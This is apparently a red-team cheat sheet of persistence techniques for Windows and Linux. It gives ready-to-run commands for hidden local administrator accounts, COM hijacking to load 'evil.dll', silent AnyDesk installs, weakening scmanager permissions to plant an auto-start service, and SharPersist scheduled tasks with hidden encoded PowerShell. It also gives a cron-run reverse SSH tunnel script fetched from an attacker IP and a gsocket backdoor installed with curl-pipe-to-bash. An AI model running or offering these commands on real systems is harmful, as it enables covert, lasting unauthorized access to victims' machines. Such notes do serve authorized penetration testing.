Hidden Local User
Cmd > net1.exe user snovvcrash$ Passw0rd! /add
PS > New-Item -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\" -Name SpecialAccounts
PS > New-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\" -Name snovvcrash -PropertyType DWORD -Value 0 -Force
PS > whoami
nt authority\system
PS > .\Suborner.exe /username:snovvcrash$ /password:Passw0rd!
Locate good targets to hijack with Procmon filters:
- Operation is RegOpenKey
- Result is NAME NOT FOUND
- Path is InprocServer32 (in-process server allowing the specified DLL to be loaded into current process memory space)
Locate CLSIDs from scheduled tasks:
{% code title="schtask.ps1" %}
$Tasks = Get-ScheduledTask
foreach ($Task in $Tasks)
{
if ($Task.Actions.ClassId -ne $null)
{
if ($Task.Triggers.Enabled -eq $true)
{
if ($Task.Principal.GroupId -eq "Users")
{
Write-Host "Task Name: " $Task.TaskName
Write-Host "Task Path: " $Task.TaskPath
Write-Host "CLSID: " $Task.Actions.ClassId
Write-Host
}
}
}
}{% endcode %}
Check if a COM component exists under a relevant registry hive by its CLSID:
PS > Get-ChildItem -Path "Registry::HKCR\CLSID\{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}"
PS > Get-Item -Path "HKLM:Software\Classes\CLSID\{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}" | ft -AutoSize
PS > Get-Item -Path "HKCU:Software\Classes\CLSID\{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}" | ft -AutoSize
If it exists under HKLM but does not exists under HKCU hive, we can hijack this COM component by creating a new item in the latter path:
PS > New-Item -Path "HKCU:Software\Classes\CLSID" -Name "{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}"
PS > New-Item -Path "HKCU:Software\Classes\CLSID\{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}" -Name "InprocServer32" -Value "C:\Windows\Tasks\evil.dll"
PS > New-ItemProperty -Path "HKCU:Software\Classes\CLSID\{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}\InprocServer32" -Name "ThreadingModel" -Value "Both"
PS > Get-ItemProperty -Path "HKCU:Software\Classes\CLSID\{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}\InprocServer32"
- https://r4wsecurity.blogspot.com/2017/12/rid-hijacking-maintaining-access-on.html
- https://github.com/r4wd3r/RID-Hijacking
- https://v3ded.github.io/redteam/abusing-lnk-features-for-initial-access-and-persistence
- https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/master/Create-HotKeyLNK.ps1
- https://redsiege.com/blog/2024/04/sshishing-abusing-shortcut-files-and-the-windows-ssh-client-for-initial-access/
- https://support.anydesk.com/knowledge/use-cases-for-the-command-line-interface
- https://support.anydesk.com/knowledge/command-line-interface-for-windows
Cmd > bitsadmin /transfer job1 https://download.anydesk.com/AnyDesk-CM.exe C:\Users\snovvcrash\AppData\Local\Temp\anydesk.exe
Cmd > C:\Users\snovvcrash\AppData\Local\Temp\anydesk.exe --install C:\Users\snovvcrash\AppData\Local\AnyDesk --start-with-win --silent
Cmd > del C:\Users\snovvcrash\AppData\Local\Temp\anydesk.exe
Cmd > echo Passw0rd! | C:\Users\snovvcrash\AppData\Local\AnyDesk\AnyDesk.exe --set-password
Cmd > cmd /c "for /f ""delims="" %i in ('C:\Users\snovvcrash\AppData\Local\AnyDesk\AnyDesk.exe --get-id') do echo %i"
Cmd > C:\Users\snovvcrash\AppData\Local\AnyDesk\AnyDesk.exe --remove
- https://0xv1n.github.io/posts/scmanager/
- https://gist.github.com/pich4ya/c15af736f0f494c1a560e6c837d77828
{% embed url="https://twitter.com/0gtweet/status/1628720819537936386" %}
Backup current SDDL for scmanager:
Cmd > sc.exe sdshow scmanager
Change it to allow everyone to create a service:
Cmd > sc.exe sdset scmanager D:(A;;KA;;;WD)
Create a service that will auto run at next reboot:
Cmd > sc.exe create lpesvc displayName= "lpesvc" binPath= "C:\Windows\System32\net.exe localgroup administrators snovvcrash /add" obj= LocalSystem start= auto
Check if scmanager SDDL has been modified:
PS > ConvertFrom-SddlString -Sddl $(sc.exe sdshow scmanager | select -Last 1) | select -Expand DiscretionaryAcl
beacon> execute-assembly SharPersist.exe -t schtask -c "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -a "-nop -w hidden -enc <BASE64_CMD>" -n "Updater" -m add -o hourly
beacon> execute-assembly SharPersist.exe -t startupfolder -f "UserEnvSetup" -m add
beacon> execute-assembly SharPersist.exe -t reg -c "C:\ProgramData\Updater.exe" -a "/q /n" -k "hkcurun" -v "Updater" -m add
Add a temporary rule allowing connections from your IP:
$ sudo iptables -A INPUT -p tcp -s 10.10.13.37 --dport 22 -j ACCEPT
{% code title="callback.sh" %}
#!/bin/bash
if [[ `ps -ef | grep -c 2222` -eq 1 ]]; then
/usr/bin/ssh -nNT -R 2222:localhost:22 [-oPubkeyAcceptedKeyTypes=+ssh-rsa -oHostKeyAlgorithms=+ssh-rsa] [-oServerAliveInterval=300 -oServerAliveCountMax=3] -oStrictHostKeyChecking=no -oUserKnownHostsFile=/dev/null -oIdentitiesOnly=yes -i /home/alice/.ssh/.k [email protected]
fi{% endcode %}
Attacker's box:
$ sudo useradd -ms /bin/false nopty
$ sudo ssh-keygen -f /home/nopty/.ssh/dummy_key -t ed25519 -q -N ""
$ cat /home/nopty/.ssh/dummy_key.pub
$ sudo vi /home/nopty/.ssh/authorized_keys
from="10.10.13.38",command="echo 'Only port forwarding is allowed'",no-agent-forwarding,no-X11-forwarding,no-pty <DUMMY_KEY_PUB>
Victim's box:
$ curl 10.10.13.37/dummy_key > /home/alice/.ssh/.k
$ chmod 600 /home/alice/.ssh/.k
$ curl 10.10.13.37/callback.sh > /home/alice/.conf
$ chmod +x /home/alice/.conf
$ crontab -e
*/15 * * * * /home/alice/.conf
Victim's box:
$ bash -c "$(curl -fsSL gsocket.io/x)"
$ bash -c "$(wget -qO- gsocket.io/x)"
Attacker's box:
$ cd ~/tools && bash -c "$(curl -fsSL https://tiny.cc/gsinst)" && cd
$ ~/tools/gsocket/tools/gs-netcat -s "<SECRET>" -i
Victim's box:
$ GS_UNDO=1 bash -c "$(curl -fsSL gsocket.io/x)"
$ GS_UNDO=1 bash -c "$(wget -qO- gsocket.io/x)"
$ pkill gs-bd